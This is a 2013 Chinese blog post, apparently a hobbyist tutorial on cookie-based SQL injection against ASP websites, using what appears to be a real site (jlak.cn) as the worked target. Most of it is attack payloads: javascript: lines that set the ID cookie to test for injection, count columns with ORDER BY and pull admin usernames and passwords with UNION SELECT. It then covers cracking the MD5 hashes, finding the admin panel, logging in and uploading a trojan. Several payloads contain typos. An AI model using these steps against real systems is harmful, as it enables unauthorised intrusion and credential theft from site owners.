关于cookie注入的初级的

今天晚上一个晚上终于把cookie注入和union联合注入搞定了,感谢H.U.C-农民,他给的站,他教的我,十分感谢~~

cookie注入原来感觉很难,现在感觉就那样了~~

第一步:首先进入一个网站,点击几个链接,使网址带上参数(如:http://www.XXX.cn/ProductShow.asp?ID=250);

第二步:后面加'判断是否进行了防注入(http://www.XXX.cn/ProductShow.asp?ID=250),发现防注入了。

第三步:使用javascript:alter(decument.cookie="ID="+escape("250"));进行注入中转(好像是这么叫的)(注意:这里的ID要和上面网址里面的对称,即他是大写就用大写,是小写就用小写,250和上面一样,上面是多少就)

第四步:判断是否有注入漏洞:javascript:alter(decument.cookie="ID="+escape("250 and 1=1"));返回正常。

                                              javascript:alter(decument.cookie="ID="+escape("250 and 1=2"));返回错误,说明有注入漏洞。

第五步:判断字段大小:javascript:alert(document.cookie="ID="+escape("250 order by 10"));正常。

                                       javascript:alert(document.cookie="ID="+escape("250 order by 50"));出错。

                                      javascript:alert(document.cookie="ID="+escape("250 order by 25"));正常。

                                       javascript:alert(document.cookie="ID="+escape("250 order by 30"));出错。

                                       javascript:alert(document.cookie="ID="+escape("250 order by 26"));正常。

                                        javascript:alert(document.cookie="ID="+escape("250 order by 27"));出错。     

在检测字段大小的时候需要注意(我们要打开两个http://www.jlak.cn/ProductShow.asp?ID=250,i一个用来改代码,一个改为http://www.jlak.cn/ProductShow.asp来不断刷新查看返回)。

第六步:检测表段: javascript:alert(document.cookie="ID="+escape("250 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from admin"));(字段是多少个,就写多少个数)

刷新http://www.jlak.cn/ProductShow.asp发现网页上出现了几个数字,选两个用username,password替换掉,比如我是2,7,那就javascript:alert(document.cookie="ID="+escape("250 union select 1,usename,3,4,5,6,password,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from admin"));

刷新,用户名和密码就出来了

第七步:MD5解密

第八步:御剑扫后台:登入,随便想干什么就干什么,传马这里不说了,我也不是很熟~

posted @ 2013-09-09 14:33  SoulReaper  阅读(1231)  评论(0编辑  收藏  举报